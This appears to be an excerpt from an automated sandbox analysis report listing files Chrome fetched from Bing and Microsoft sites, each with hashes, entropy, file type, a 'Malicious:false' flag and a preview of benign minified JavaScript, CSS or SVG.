                                                                            Entropy (8bit):5.257735169047519
                                                                            Encrypted:false
                                                                            SSDEEP:24:2k7pl5aFCoMZLuZW+HTTvxOev3DAKBvADJqtLf9v1PYvzrRXsamQ0/knDfLjanX2:zTAIoauZ5tfUKIuvuvzty8nanQoA
                                                                            MD5:A35E7305B227D9877C8A9DB2B6CE44EC
                                                                            SHA1:8253154810F88704F8AD09B56111A432A0EF55ED
                                                                            SHA-256:C3174CDE987DCCE243B7FCD84AC88183B435360320162FD9AED6A5AC2C92A949
                                                                            SHA-512:0BE89A153B44060433DC37A9C9A3040904502252B831326BCA72D653983617D09B0DF6DA119B85D109BDEF60CE91011F4696F3902EC766D14B1F560AA530FC65
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(n,t,i){function f(){!u.end&&s===a&&s>0&&i(w,0)}function o(n){if(n&&n.length)return r[n]||(r[n]={start:0,end:0,actual:0,done:0},s++),r[n]}function v(){var n=[];for(var t in r)r.hasOwnProperty(t)&&(n.push(t),u.actual+=r[t].actual);return n.sort(function(n,t){return r[t].actual-r[n].actual}),n}function y(){var f=[],e=0,t=v(),i,n,u;if(t.length>0)do if(i=t.shift(),n=r[i],!(n.start<_G.ST)){if(u='"'+i+'":{"S":'+(n.start-_G.ST)+',"E":'+(n.end-_G.ST)+',"T":'+n.actual+"}",e+=u.length+1,e>=d)break;f.push(u)}while(t.length>0);return f.join(",")}function p(){function i(n){return n=n.toString().replace(/\"/g,"'"),'"'+n+'"'}var r=[],t,n;for(t in e)e.hasOwnProperty(t)&&(n=e[t],typeof n!="number"&&(n=i(n)),r.push(i(t)+":"+n));return r.join(",")}function w(){u.end||(u.end=new Date,(new Image).src=_G.lsUrl+'&Type=Event.PPT&DATA={"S":'+(u.start-_G.ST)+',"E":'+(u.end-_G.ST)+',"T":'+u.actual+',"I":'+u.numInvalid+',"N":{'+y()+'},"M":{'+p()+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:""))}function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (51959), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):52257
                                                                            Entropy (8bit):5.363481407411028
                                                                            Encrypted:false
                                                                            SSDEEP:1536:spaW66ZzHurMClLfQov++dwfmlXizq08lbBgOAue8NsRKB:3eGL
                                                                            MD5:8AC09A57B5373828BC493167C885F219
                                                                            SHA1:0840AC4ACC2087380E461104D06DA3EE87FCF8BC
                                                                            SHA-256:165AA01269ADDD96BE81E65B18F5396FBB8FF0C616A8F5DA50AC45072300438D
                                                                            SHA-512:243E7DF829825EFD74C0A0A8F58C91E5F4A15F0DC47598122349C82D98FCAC10A409D57DAA5D2481BC3E37B743C4CE773424FECA57C0C9D16F93323C59B2BA8C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/lib/bootstrap/bootstrap-select.min.js
                                                                            Preview:/*!.. * Bootstrap-select v1.13.14 (https://developer.snapappointments.com/bootstrap-select).. *.. * Copyright 2012-2020 SnapAppointments, LLC.. * Licensed under MIT (https://github.com/snapappointments/bootstrap-select/blob/master/LICENSE).. */....!function(e,t){void 0===e&&void 0!==window&&(e=window),"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery")):t(e.jQuery)}(this,function(e){!function(z){"use strict";var d=["sanitize","whiteList","sanitizeFn"],r=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],e={"*":["class","dir","id","lang","role","tabindex","style",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:[],b:[],br:[],col:[],code:[],div:[],em:[],hr:[],h1:[],h2:[],h3:[],h4:[],h5:[],h6:[],i:[],img:["src","alt","title","width","height"],li:[],ol:[],p:[],pre:[],s:[],small:[],span:[],sub:[],sup:[],strong:[],u:[],ul:[]},l=/^(?:(?:https?|mailto|ftp
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (540), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):540
                                                                            Entropy (8bit):4.792851791232716
                                                                            Encrypted:false
                                                                            SSDEEP:12:Ogc0zM1ekqg6XHDhL9HUXyDmsLm4KNDXF/Xi4QkKNDXF/XTgsfAIeX4IUIO:OgDGrq/TV9HUXCh8LF/Xi4V8LF/XshI5
                                                                            MD5:6DBBC36CABC19D1DE8EC05C6ECCCFD96
                                                                            SHA1:631C927BBD5EE3EA6D31C40D1529720DC151BBA1
                                                                            SHA-256:03DD0B9127451450FCD3C706CA79F6663F121EEF7630DDC908571F08C1E79F8F
                                                                            SHA-512:5FC5F9C9F884589307F9C3F1DDC97CBCD5551A8DF2E7D5CCF2181DD69D57332901FA31182BDC3CBF0594FFD03848EE6D980EB51BCF49301BCC04027BF2EA81B9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/YxySe71e4-ptMcQNFSlyDcFRu6E.js
                                                                            Preview:var ErrFuncs;(function(n){function i(n,i,r){t("Error",n,i,r)}function r(n,i,r){t("Warning",n,i,r)}function t(n,t,i,r){var u,f;if(r?(u=r,u.message+=" "+t):u=new Error(t),u.extra="manualError",i&&(u.extra+=" "+i),u.severity=n,f=_w.jsErrorHandler,f)f(u);else throw u;}n.LogError=i;n.LogWarning=r})(ErrFuncs||(ErrFuncs={}));JS={LogError:ErrFuncs.LogError,LogWarning:ErrFuncs.LogWarning};SharedLogHelper={LogError:ErrFuncs.LogError,LogWarning:ErrFuncs.LogWarning,LogFatalError:function(){return null},RegisterErrorFilter:function(){return null}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (412), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):412
                                                                            Entropy (8bit):5.17305928357574
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QBdoySw+YEXj3Gs07fZVD7H82MgNukm7UqgU:2Qb7+YEXz4fZxHjmoRU
                                                                            MD5:581C2C396720F651CC2F3D40E9E727F8
                                                                            SHA1:6515C6C20730DCF81A861EA8D16682AAC4DDA273
                                                                            SHA-256:D6787BD009EA758F8ABDD437032799F7004247FC10F631B93AF0FA84607597EC
                                                                            SHA-512:E7198C04B0E8CEE80B8278E77FA0C301915B32F62C0DB36C1D7D2D9E20A7ACD578308070EB833ED8450A2360358E118E55B47DB149FB4AB8053E8FAA2C925568
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/ZRXGwgcw3Pgahh6o0WaCqsTdonM.js
                                                                            Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(){var i,t,r;if(n&&Lib.CssClass.contains(n,"b_active"))try{i=_ge("b_header");i.scrollIntoView({behavior:"smooth"});t=_ge("sb_form_q");t.focus();t.click();r=t.value;t.setSelectionRange(0,r.length)}catch(u){_w.sj_log&&sj_log("CI.WebScope","error",u.message)}},!0)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):280
                                                                            Entropy (8bit):4.908465163481109
                                                                            Encrypted:false
                                                                            SSDEEP:6:qbLkAOpmB4hImTzBwhLM1whA+XzFE8KSiQLGPQQgnaqza:IQA7B2IkzaLMGAMzDBVKY+ia
                                                                            MD5:2166C09EA15BA88E843D4E84DF2C48A3
                                                                            SHA1:CBFF10FF66823D5EF13309A7913C600EEAEBA187
                                                                            SHA-256:02F6E697A3AAB3BE32F5FB28488862BF9ED344B4D60CCDF85CD1E244FF285C62
                                                                            SHA-512:5AD51B625E96AFB5E3452DF6214B1BC63676E46490BFC15EFB3FE00C27ADC35D4336A85D00F9D37A840E3D98B61FD90DED6C5A18452F03033BE9AC4C05AD24B0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/y_8Q_2aCPV7xMwmnkTxgDurroYc.js
                                                                            Preview:var Button;(function(){typeof WireUp!="undefined"&&WireUp.init("button_init",function(n){var t=n.getAttribute("data-appns"),i=n.getAttribute("data-k");sj_be(n,"click",function(){Log.Log("Click","Button","",!1,"AppNS",t,"K",i,"Category","CommonControls")})})})(Button||(Button={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (920), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):920
                                                                            Entropy (8bit):5.147863279225289
                                                                            Encrypted:false
                                                                            SSDEEP:12:0wzFs6dFxgYUHx2bBU6ZayBUkebGfCYjpOP+NILExzbD+qQNfR6qeVpF0:3pdFp4U57FeWCYVOPNw0qKf0zpF0
                                                                            MD5:0F377E82BD7C7567A19A65F7A6895475
                                                                            SHA1:46A2708BD8AA676E182EF538E17384F170668FF7
                                                                            SHA-256:81513BC42881612C4A530CE3ABAAA528F4827EE756A91355961E0FF062D02A98
                                                                            SHA-512:E3D1FBC658E221CF14995AF279D11DE7E1B74DF4196A9F0D2EDB1730DC35331E176B4F451D194E6849F6283ECC1B79C82DD0EEEE03982146D0BC47F281FEE0FA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/RqJwi9iqZ24YLvU44XOE8XBmj_c.css
                                                                            Preview:#sb_clt{display:inline;margin:0 6px 0 0;top:-1px}.sb_clrhov{visibility:hidden}.b_searchboxForm.sh-b_searchboxForm #sb_clt,#detailheader #sb_clt{display:none}body.b_sbText #b_header .b_searchboxForm:hover .sb_clrhov,body.b_sbText.as_on #b_header .sb_clrhov,body.b_sbText #b_header.b_focus .b_searchboxForm .sb_clrhov{visibility:visible}*[data-sbtipx]:hover::after{position:absolute;top:40px;left:6px;background-color:#666;content:attr(data-sbtipx);font:13px/18px Arial,Helvetica,sans-serif;white-space:nowrap;color:#fff;padding:10px 15px;transform:translateX(-50%);box-shadow:0 0 0 1px rgba(0,0,0,.06),0 4px 12px 1px rgba(0,0,0,.14);border-radius:4px;z-index:4}*[data-sbtipx]:hover::before{position:absolute;bottom:-27px;left:6px;background-color:#666;width:12px;height:12px;content:"";transform:translateX(-50%) rotate(45deg);z-index:6}.as_on *[data-sbtipx]:hover::before,.as_on *[data-sbtipx]:hover::after{display:none}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2973), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2973
                                                                            Entropy (8bit):5.352495844975926
                                                                            Encrypted:false
                                                                            SSDEEP:48:Yc/UH6JCZ1n9Hc67HCBIjq7uziBuJG+yiOUJMU8bnWzknw0ow5WO7wxRIjCRxGHG:pw6CD9HccCgLmQG+FzJe4Jc5WvxRmCRH
                                                                            MD5:FED73198B7A6F66CB0437285861ABF2C
                                                                            SHA1:F99EDB64121B7AD72ED2BF32CE3C43119E065214
                                                                            SHA-256:ED46B58E057A54BFE3C3250487B4F885B0AE22EABB93E10CC45C13E3B97F32F2
                                                                            SHA-512:32C388C5BD1E960288BEB06336F26B72C24731776D5CB02B5230037E2655C610F9F59E42566E8345571078EC6F5E00CD9DBDA8E0C5B5F78FD3157AB0E4C9FC77
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(n,t,i,r,u,f,e,o){if(typeof RMS_IACL=="undefined"){_w.RMS_IACL={};var s,h,c="data-src",w="data-dpr",l="getAttribute",g=/^(\/th\?(?:id\=|.*&id\=))([^&]*)(.*)$/i,nt=/(&|\?)bw=/i,tt=".svg",a=3,y=20;function b(t){var r,i;t&&(r=t[l](c),r&&(t.removeAttribute(c),i=n("img"),i.onload=function(n){h--;i.onload=null;var r=t.parentNode;r&&(p(t,i),t.parentNode.replaceChild(i,t));v(n,i,r,null)},i.onerror=function(n){h--;v(n,i,!1,t)},i.src=r))}function it(t,i,r,u){for(var f,y,o=[],e=t[i],s=i;s<r;s++)o.push(t[s].tid);f=n("img");f.onload=function(n){var y,o,b,c,k;h-=r-i;f.onload=null;p(e,f);var it=e[l]("data-width"),g=e[l](w),u=g?parseFloat(g):1;for(y=i;y<r;y++){o=t[y];b=o.style;b.position="relative";b.overflow="hidden";b.direction="ltr";p(o,o);c=f.cloneNode();k="";o.hasAttribute("title")?(k=o.attributes.title.value,c.setAttribute("title",o.attributes.title.value)):o.hasAttribute("alt")&&(k=o.attributes.alt.value);c.setAttribute("alt",k);c.removeAttribute("width");c.removeAttribute("height");va
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (484), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):484
                                                                            Entropy (8bit):5.141314882871484
                                                                            Encrypted:false
                                                                            SSDEEP:12:AEEBRKzMu7IARLVdDnQxIAR63DnnkIARTYzVuDeAEIcd:A5nMxhqxx63jkxT7/hcd
                                                                            MD5:E940F03812097CF7522447C3BF9BAE06
                                                                            SHA1:7D85417CF8EA8638A688082773E3135A3195EE7D
                                                                            SHA-256:9E68E61C6F3827225836353502B53530C462B1F884D5B8E6EDC1EC661B42EE18
                                                                            SHA-512:B994BD1A17CAFAC214869C603E3BE51C5241A2B5D503138515E5FDC1FAB5348ABCA0519EA30979D54DCE3C7BE6E67963E77FE408E42C76AE8B02FACD0752E172
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/fYVBfPjqhjimiAgnc-MTWjGV7n0.css
                                                                            Preview:#b_dynRail{display:inline-block;vertical-align:top;padding-left:60px;max-width:472px;width:472px}#b_dynRail .b_dr_mod:not(:last-child){margin-bottom:10px}@media only screen and (max-width:1908px){#b_dynRail{width:382px}}@media only screen and (max-width:1818.9px){#b_dynRail{width:294px}}@media only screen and (max-width:1730.9px){#b_dynRail{display:none}}#b_dynRail .b_entity{margin-bottom:20px;padding:9px 19px 4px;width:100%;box-shadow:0 0 0 1px rgba(0,0,0,.05);border-radius:6px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1293), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1293
                                                                            Entropy (8bit):5.1818500327560475
                                                                            Encrypted:false
                                                                            SSDEEP:24:2Q5xRWDVsFrvoUdVK8DncSxAqCVp2JP2Qm0UH0jziQJ4pOmb9+kxJ7rQiSDpEcM:/wDCLoUdV9nKqC7Gl3UWeQ+Rb9+kxsa
                                                                            MD5:1219DC0FC961884C63E3746A49D110D3
                                                                            SHA1:394C2FC179A2701BB15EFAB41A3FA052258603F9
                                                                            SHA-256:58AB30F993E014D3EE0E952C74811A8B34B13DB0AC41A97E94606C507BB0F798
                                                                            SHA-512:6403FF66B8A5FD0EA11D27EC5C379ECEEB9AD66762FFA773CEB0521EADB85828F99B8ED8223683E4E164180BD5E984F000335F3337D532CFE21E9AA5EED5C57E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){for(var t=_d.getElementsByTagName("a"),i=!1,r,u=_G!==undefined&&_G.NTT!==undefined?_G.NTT:null,n=0;n<t.length;n++)typeof t[n]=="undefined"||!t[n].hasAttribute("target")||t[n].getAttribute("target")!="_blank"||!t[n].hasAttribute("href")||typeof t[n].getAttribute("href")=="undefined"||typeof t[n].getAttribute("href").startsWith=="undefined"||t[n].getAttribute("href").indexOf("javascript")>=0||t[n].getAttribute("href").indexOf("/rebates/welcome")>=0||t[n].hasAttribute("class")&&t[n].getAttribute("class").indexOf("b_ignbt")>=0||t[n].hasAttribute("onclick")&&t[n].getAttribute("onclick").indexOf("return false;")>=0||(sj_be(t[n],"click",function(n){for(var t=sj_et(n);t!=null;){if(t.tagName.toLowerCase()=="a"){u!=null&&(r=sb_st(function(){i=!0},u));break}t=t.parentNode}}),sj_evt.bind("uarequery",function(){sb_ct(r)}));u!=null&&(window.history.scrollRestoration="auto",_d.addEventListener("visibilitychange",function(){if(_d.visibilityState==="visible"&&!(_w&&_w._isConvAutoHide)&&(sj_
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1937
                                                                            Entropy (8bit):5.461252594947073
                                                                            Encrypted:false
                                                                            SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                            MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                            SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                            SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                            SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/vkKlDoUyGOL4PeOKzDZAxZIlz68.js
                                                                            Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (932), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):932
                                                                            Entropy (8bit):4.8639801459438035
                                                                            Encrypted:false
                                                                            SSDEEP:24:cfuGDtVkW+UhH7RqDqH7y77VqT77ERbpqh77IN0aFbl+Qb:F2kbaHFAQMAw0KF
                                                                            MD5:473A7968AC0A06AD0D73F9FA3B3EE565
                                                                            SHA1:90AE012F8F413ACBA5500084D783D31EC68AA151
                                                                            SHA-256:C1C5383B2AB1859F4293E5D6BBE47A19824EAB5E3E4C69B2CF07B80ADC20CDB0
                                                                            SHA-512:F9D8BB5F4BEE888A5929009E31DBBAB59894A1F649DF58A505A3370276AD2B50BA1A08A721CCCF387CBA1EE3CA9DAA0223CEBAA97CBBF1C5C62E7BF19901C378
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/kK4BL49BOsulUACE14PTHsaKoVE.css
                                                                            Preview:a.cbtn,.cbtn a,.cbtn input{-webkit-appearance:none;border-radius:2px;border:1px solid #ddd;min-width:50px;max-width:100%;line-height:30px;padding:0 15px;display:inline-block;font-size:inherit;text-align:center;text-decoration:none;cursor:pointer;font-weight:normal}a.cbtn.b_compact,.cbtn.b_compact a,.cbtn.b_compact input{line-height:26px}a.cbtn,.cbtn a,.cbtn input,#b_content a.cbtn,#b_content a.cbtn:visited,#b_content .cbtn a,#b_content .cbtn a:visited{color:#666;background-color:#f5f5f5}#b_content a.cbtn:hover,#b_content .cbtn a:hover,.cbtn input:hover{background-color:#f9f9f9;color:#111;border-color:#ccc;box-shadow:0 1px 2px 0 rgba(0,0,0,.1)}#b_content a.cbtn:active,#b_content .cbtn a:active,.cbtn input:focus,.cbtn input:active{background:#ececec;color:#111;border-color:#ccc;box-shadow:none}.cbtn input{height:32px;vertical-align:middle}.cbtn.b_compact input{height:28px}.cbtn input::-moz-focus-inner{padding:0;border:0}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1673), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1673
                                                                            Entropy (8bit):4.8709825422108635
                                                                            Encrypted:false
                                                                            SSDEEP:24:PYMucxZ83/iheWZ2TvLhqx0C+CaweXhIDgu+wZgCJFVegJKKngVnX:PYi83dhqx0BR/Gl+wJFV9NgVX
                                                                            MD5:C9D67150A3E231F8CFCB1FE543F1674B
                                                                            SHA1:162FD3441EE52565A5CAB28A75D7E7EF14027547
                                                                            SHA-256:02C63D1FD9DD7A3C95215CEC6D15345892B91A175B12ED5C811E00CB2D3677F0
                                                                            SHA-512:5C78E11E02E7643E351663E658EAA5BD7D957B02BF41D653E9B0C445981B3630795B02CD11ACE2B98526851BF0BEDB751BDC56E1734C5C825FD6B85A6F730AAE
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/4N/cc,nc/snnSLSAwgsOSJF1HZbQVd81R95o.css?bu=Au0R-hE&or=w"
                                                                            Preview:.toggle_hidden{display:none}.toggle_ctrl{display:inline-block;vertical-align:middle;margin-left:5px;width:38px;height:16px;overflow:hidden}.toggle_img{position:relative;top:0;left:0}.toggle_label{display:inline-block;width:173px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.no_outline .toggle_item{outline:none}.toggle_item{cursor:pointer}.toggle_img svg{width:36px;height:16px}.toggle_img .bg{fill:#919191;display:block}.toggle_img .bgOverlay{fill:#fff;stroke:#919191;display:none}.toggle_img.overlay .bg{display:none}.toggle_img.overlay .bgOverlay{display:block}.toggle_img .indicator{-webkit-transform:translateX(-20px);transform:translateX(-20px);transition:cubic-bezier(.3,.5,.1,1) .15s}.toggle_img.toggle_on .indicator{-webkit-transform:translateX(0);transform:translateX(0)}.toggle_img.overlay .indicator{fill:#919191}.toggle_img.overlay.toggle_on .indicator{fill:#00809d}.toggle_img.toggle_on .bg{fill:#106ebe}.toggle_img.disabled .bg,.toggle_img.toggle_on.disabled .b
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):219
                                                                            Entropy (8bit):5.119404786158862
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXh6BodmYWyXPBsw+SFsjRntLsMIxwCDrlT:2QBdoySw+YEOM8nlT
                                                                            MD5:33C123623267DDCCC3506DE4E71C105B
                                                                            SHA1:61C759ACDD259A7520988C3D0D58BB4C5A25D87E
                                                                            SHA-256:DDA145AF1F9D026E6C080B2D21FE7CA1CD46F4FB58DC1CAE1474C119B1E1FF2C
                                                                            SHA-512:0D0B40C625997D91D216DF9489D8D048047FC5179C264EEB77B8B1D28E5E11DFD633BE4B3AF07AFD96F9E0F526E5DD1BA97232AA6DE1B05A94FC60682321D151
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/YcdZrN0lmnUgmIw9DVi7TFol2H4.js
                                                                            Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(t){n&&Lib.CssClass.contains(n,"b_active")&&(sj_pd(t),sj_sp(t))},!0)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:downloaded
                                                                            Size (bytes):242
                                                                            Entropy (8bit):5.203361030947984
                                                                            Encrypted:false
                                                                            SSDEEP:6:tvKIiad4mc4sl3MNWgZPqt4BGxngLEDurdGo6K/:tvG1MNWcPqtMZF/
                                                                            MD5:5F1896B9BA3B5BBFF5167A84A8BF30CA
                                                                            SHA1:93585E6A22D05B27A7B157957F10F7CC1FE2E6CC
                                                                            SHA-256:41AB929756123C1EC0A9F778FC98429DE6ED7B33B0DDA0876816C6C21A8C91F8
                                                                            SHA-512:749180794DBED2E9C45F156693F6948B9D63B2857F0278B6BE17A481DB33BDDF88CA3EE7A04512D518EF5C8F7EC5082737B5463F908FE7024F95E044F066FEC4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/images/inreplyto.svg
                                                                            Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 16.97"><title>threaded-reply</title><path d="M0,1.65H1.65V9.84H16.87l-6-6,1.16-1.15,8,8-8,8L10.9,17.46l6-6H0Z" transform="translate(-0.01 -1.65)"/></svg>
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (379), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):379
                                                                            Entropy (8bit):5.122348535910386
                                                                            Encrypted:false
                                                                            SSDEEP:6:AWKzCNWDJMuLPQCtkINKzQIT8mX8ROI2MBUVQqE2rTDhZQ2DaDmUJpowu2Y:AWKLJFPbkI63wmXRI2MyVk2HDhZ1magO
                                                                            MD5:B0036EA73C514B92A3FB402BD49BD831
                                                                            SHA1:DC80BDFF167E521D00D778113E1DD28C2AEE5EEE
                                                                            SHA-256:F004C1447AECB7B95C96A067AFBEF6E999BC1A6DABBD7901237DE5E85BF85336
                                                                            SHA-512:64517355C84D9040324B2845C54F1A956D1462EBF45E0016181F5F5041931A98A72076D926BBDF18518662F978BF8B5C2051B0A1C2810E29F7A21DEE7FAA2935
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/3IC9_xZ-Uh0A13gRPh3SjCruXu4.js
                                                                            Preview:function wpc_Inst(n,t,i){var r=sj_evt.bind,u=0,f=0;r&&n&&t&&i&&(r("RMS.ImgAOLInit",function(){n.register(i)},1),r("RMS.ImgAOLCompleted",function(){n.schedule({task:function(){n.recordTimings(i,u,f);n.complete(i)}})},1),r("RMS.ImgAOLLoaded",function(n){var i,e,r;n.length<2||(i=n[1],i&&i.state==="success")&&(e=i.image,e&&sj_we(e,t))&&(r=i.timeStamp,u===0&&(u=r),r>f&&(f=r))},1))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):53
                                                                            Entropy (8bit):4.7040588978369655
                                                                            Encrypted:false
                                                                            SSDEEP:3:ziS6CrT4+AgfdFC:ziS6CrT53fdFC
                                                                            MD5:8E1BAF241DC507AAB36ADE9E65916EED
                                                                            SHA1:6160FBDD88F78E2E1516D89BD1D345E639A54C10
                                                                            SHA-256:51BA13183AD6F6C1303F27C0FA617D6C24FE04820FDADA0CC2A82BB1252CFB6C
                                                                            SHA-512:D81EF5D9BCD11DD3145FDE2177B61DA418ABE7B0233ED035D7ABEBA10B8565D5CA4F8BE53B18694F65DC6C8546D303A3DBAEDFBA5DFD0A8E52DB621CC5E31654
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/YWD73Yj3ji4VFtib0dNF5jmlTBA.css
                                                                            Preview:.b_tpcn .sw_ddgn:after{transform-origin:-180px -52px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                            Category:downloaded
                                                                            Size (bytes):49911
                                                                            Entropy (8bit):7.994516776763163
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
